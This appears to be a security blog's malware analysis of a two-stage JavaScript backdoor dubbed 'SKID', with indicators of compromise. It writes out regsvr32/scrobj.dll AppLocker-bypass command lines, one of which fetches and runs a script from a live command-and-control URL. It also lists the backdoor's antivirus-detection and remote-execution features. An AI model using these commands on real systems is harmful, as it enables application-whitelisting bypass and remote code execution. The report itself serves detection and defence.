
Analyzing a Customer EndPoint, we identified a new threat that expolits a recent exploit S.O. Micorosft Windows technique, discovered on April 2016 and called “Applocker Bypass“.
We called this threat “SKID“, because inside the code there are a lot of keywords with this name.
Indicators of Compromise to detect compromised EndPoint are advertised.
APPLOCKER BYPASS – EXPLOITING TECHNIQUES
The new threat, identified as “SKID” uses a recent exploit S.O. Windows technique called “Applocker Bypass“; thanks to this technique it is possible to execute VB or JS scripts using the system process regsvr32.exe.
This exploit technique, discovered on April 2016, is detailed documented on this links:
http://www.subt0x10.blogspot.it/2016/04/bypass-application-whitelisting-script.html
http://betanews.com/2016/04/25/bypass-applocker-security/
We tracked this process that was exploited to execute a javascript located on the victim user’s share.
“SKID” uses the following command line to been activated:
regsvr32.exe /s /n /u /i:”C:\Users\[username]\AppData\Roaming\9DB0F2C13D.txt” scrobj.dll
FIRST STAGE – JAVASCRIPT DOWNLOADER
The analyzed file has the following details:
File name: 9DB0F2C13D.txt
File path: C:\Users\[username]\AppData\Roaming\
File size: 14646 Bytes
MD5: 28DD8E548FAE06C9114D1593150F3860
From the first lines on the header file it is possibile to notice that it’s a Jascript script, but this code appears hidden.
Revealing the code, we obtained these evidences:
- There is a function that check the Internet connection, making an http request to update.microsoft.com host
- The Backdoor executes http GET request to 8.8.8.8 host
- It reads the registry key HKEY_CURRENT_USER\Software\Microsoft\Notepad\<username> in which we can find references to the installed Backdoor
- It verifies if the threat is alredy installed, checking through WMI if the regsvr32 process is in execution
- The script downloads a real Backdoor javascript from the following address hxxps://webmail.xcloud.kz/js/changelog.txt nella cartella dell’utentde C: \Users \<username> \ AppData \ <filename>.txt to execute it on the system, with the “Applocker Bypass” exploiting technique with the following command: C: \windows \system32 \regsvr32.exe” /s/n/u/i:https://webmail.xcloud.kz/js/changelog.txt scrobj.dll
This first file appears to be a real downloader, created ad-hoc to exploit the exploiting technique described.
SECOND STAGE – JAVASCRIPT BACKDOOR
The second file analyzed has the following details, and it’s a real Backdoor developed in javascript and now is at the 2.0 version:
File name: changelog.txt
Downloaded from: hxxps://webmail.xcloud.kz/js/changelog.txt
File size: 43686 Bytes
MD5: 09BCF50D498C67942A4F70FDD72D2913
As the first file, also for this, the header is very similar.
The javascript file is hidden again, and the code has been revealed to analyze malware characteristics:
The Backdoor is able to obtain the following information:
Il file javascript risulta offuscato, ed è stato de-offuscato il codice in modo da analizzare le caratteristiche del malware:
- Operating System and Architecture (32 o 64 bit)
- It recognizes if on the system is installed or in execution one of the following antivirus:
- Windows Defender
- McAfee
- Avast
- Avira
- AVG
- TrendMicro
- Panda
- F-Secure
- Kaspersky
- Symantec
- Sophos
- Bitdefender
- ESET
- Comodo
- MalwareBytes
- Norton
- ClamAV
- TrusteerRapport
- DeepFreeze
- 360 Total Security
- Seqrite EndPoint Security
- Quick Heal
- Fortinet
- Bitdefender Endpoint Security
- ByteFence
- G-Data
- Webroot
- Computer serial number
- Local computer IP
- Backdoor installed version (during the analysis it was v2.0)
With this Backdoor the attacker can execute the following tasks:
- Binary files download and execution (.exe and .dll)
- Sciprt .js or .vbs download using the exploiting “AppLocker Bypass” technique
- Threat removal from victim PC
- Remote command execution on victim PC
CnC – DOMAIN ANALYSIS
The CnC identified is the following:
Hostname: webmail.xcloud.kz
IP: 82.211.34.91
The domain xcloud.kz has been registred on November 2016, the 15 and, also the SSL webmail.xcloud.kz host certificate is valid from the 15th November 2016 to the 16th November 2017.
From these evidences it’s possible to speculate that the attacker had implemented and distributed the Backdoor’s firsts versions on the end of 2016.
INDICATORS OF COMPROMISE
The helpful IoC to investigate and verify if the threat can be identified on further EndPoint are the following:
– MD5
28DD8E548FAE06C9114D1593150F3860
09BCF50D498C67942A4F70FDD72D2913
– NETWORK ACTIVITY
CnC IP: 82.211.34.91
CnC hostname: webmail.xcloud.kz
CnC URL: hxxps://webmail.xcloud.kz/js/ajax.php
Comportamento anomalo: connessioni in uscita verso 8.8.8.8 (Google IP) su porta 80, protocollo HTTP
– REGISTRY KEYS
HKEY_CURRENT_USER\Software\Microsoft\Notepad\<username>
You must be logged in to post a comment.